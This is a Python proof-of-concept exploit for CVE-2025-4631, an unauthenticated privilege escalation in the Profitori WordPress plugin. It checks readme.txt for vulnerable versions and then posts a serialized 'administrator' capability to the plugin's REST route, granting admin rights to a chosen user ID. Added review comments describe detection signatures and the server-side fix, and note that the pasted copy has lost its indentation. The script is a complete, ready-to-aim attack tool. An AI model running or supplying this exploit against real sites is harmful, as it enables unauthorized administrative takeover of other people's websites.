#!/usr/bin/env python3
# Proof-of-concept script for CVE-2025-4631 (Profitori WordPress plugin).
# Read from a defender's side, this file shows two things worth knowing:
#   1. what the attack traffic looks like on the wire (the readme.txt probe
#      and the POST to the stocktend_object REST route carrying a
#      serialized "administrator" capability), which is what to alert on;
#   2. that the mitigation is on the server: the plugin versions matched
#      below should be updated, and the REST route must enforce an
#      authenticated capability check before accepting "users" objects.
# NOTE(review): the pasted copy has lost all indentation; the code lines
# are left byte-identical here and only comments were added.
import argparse
import requests
import json
import time
from urllib.parse import urljoin
import re
# By : Khaled Alenazi (Nxploited)
# Disable SSL warnings
# NOTE(review): `requests.packages.urllib3` is a compatibility alias; newer
# requests releases may not expose it — confirm before relying on it.
requests.packages.urllib3.disable_warnings()
# Setup argument parser
parser = argparse.ArgumentParser(
description="🚨 Exploit for CVE-2025-4631 - Unauthenticated Privilege Escalation in Profitori Plugin\n# By Nxploited (Khaled Alenazi)"
)
parser.add_argument("-u", "--url", required=True, help="🌐 Target base URL (e.g., http://example.com/wordpress)")
parser.add_argument("-id", required=True, type=int, help="🆔 User ID to escalate (must exist)")
parser.add_argument("--email", default="[email protected]", help="📧 Fake user email (optional)")
parser.add_argument("--name", default="Nxploited", help="👤 Display name (optional)")
parser.add_argument("--url_field", default="https://github.com/Nxploited/", help="🔗 User profile URL (optional)")
parser.add_argument("--verbose", action="store_true", help="🔍 Enable verbose output and print JSON details")
args = parser.parse_args()
# Set custom session with User-Agent
# Detection note: the User-Agent below is a generic desktop Chrome string,
# so it is not a reliable indicator on its own; the request path and body
# are the durable signals.
session = requests.Session()
session.headers.update({
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36",
"Content-Type": "application/json"
})
# Certificate verification is disabled for the whole session; any TLS
# interception or self-signed target is accepted silently.
session.verify = False
# Check version
# Detection note: an unauthenticated GET of the plugin's readme.txt is a
# common reconnaissance step; it is noisy but cheap to log.
readme_url = args.url.rstrip("/") + "/wp-content/plugins/profitori/readme.txt"
print(f"[📄] Checking plugin version at: {readme_url}")
try:
resp = session.get(readme_url)
if resp.status_code == 200:
# Only these two exact "Stable tag" values are treated as vulnerable;
# any other tag exits below. A missing/unreachable readme.txt falls
# through to the request anyway.
match = re.search(r"Stable tag:\s*(2\.0\.6\.0|2\.1\.1\.3)", resp.text)
if match:
print(f"[✅] Vulnerable version detected: {match.group(1)}")
print("[🚀] Exploiting in 3 seconds...")
time.sleep(3)
else:
print("[🛡️] Plugin version is not vulnerable. Exiting.")
# `exit()` is the site-module helper, not `sys.exit`; it is absent
# when Python runs with -S.
exit()
else:
print("[⚠️] Version check failed (readme.txt not found), attempting exploit anyway...")
except Exception as e:
# Broad catch: network errors are reported and the script continues.
print(f"[⚠️] Error fetching version info: {e}\n[⏳] Proceeding with exploitation...")
# Build payload
# Detection/mitigation note: the body is a JSON list of one object with
# `_datatype: "users"` and a PHP-serialized `wp_capabilities` granting
# "administrator". A WAF/IDS rule on this route that matches
# `wp_capabilities` (or `_datatype":"users"`) from a session without a
# WordPress auth cookie/nonce is a direct signature; server-side, the
# route should never accept capability fields from unauthenticated input.
payload = [
{
"_datatype": "users",
"id": args.id,
"wp_capabilities": "a:1:{s:13:\"administrator\";b:1;}",
"user_email": args.email,
"display_name": args.name,
"user_url": args.url_field
}
]
# Manually build API endpoint
# `urljoin` is imported above but unused; the path is concatenated by hand.
endpoint = args.url.rstrip("/") + "/wp-json/stocktend/v1/stocktend_object"
print(f"[📡] Sending privilege escalation request to: {endpoint}")
try:
# Unauthenticated POST: no cookie, nonce or token is attached, which is
# the core of the issue this PoC demonstrates.
response = session.post(endpoint, data=json.dumps(payload))
if response.status_code == 200:
# Note: a 200 is taken as success without checking the body; the
# printed user list below is what the server echoed back, if any.
print("[🎯] Exploit completed successfully!\n")
try:
parsed = response.json()
print("[🧾] Updated User Information:")
for user in parsed:
print("--------------------------------------")
print(f"🆔 User ID : {user.get('id')}")
print(f"👤 Username : {user.get('user_login')}")
print(f"📧 Email : {user.get('user_email')}")
print(f"🪪 Display Name : {user.get('display_name')}")
print(f"🔗 User URL : {user.get('user_url')}")
print(f"🛡️ Role Raw : {user.get('wp_capabilities')}\n")
except Exception as json_err:
# Non-JSON or non-list bodies land here (a dict would also fail
# on `user.get` if its items are not dicts).
print("[❌] Could not parse JSON response:", str(json_err))
if args.verbose:
print("[Verbose JSON]\n", response.text)
print("[👑] Exploit By : Nxploited (Khaled_alenazi)")
print("🔗 GitHub : https://github.com/Nxploited")
print("📧 Email : [email protected]")
else:
print(f"[❌] Exploit failed. HTTP Status: {response.status_code}")
if args.verbose:
print("[Verbose Response]\n", response.text)
except Exception as e:
print(f"[🔥] Error during request: {e}")